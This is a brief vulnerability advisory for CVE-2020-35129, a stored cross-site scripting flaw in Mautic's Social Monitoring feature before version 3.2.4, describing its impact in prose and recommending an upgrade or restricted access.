CVE-2020-35129

Name of the Vulnerable Software and Affected Versions: Mautic versions prior to 3.2.4

Description: The issue affects Mautic, allowing an attacker with access to the Social Monitoring feature to perform stored XSS attacks on other users, including administrators. This could enable the attacker to load an externally drafted JavaScript file, potentially allowing them to change the target user's password or email address, or even elevate their own user role from a low-privileged user to an administrator account.

Recommendations: For versions prior to 3.2.4, update to version 3.2.4 or later to resolve the issue. As a temporary workaround, consider restricting access to the Social Monitoring feature to minimize the risk of exploitation.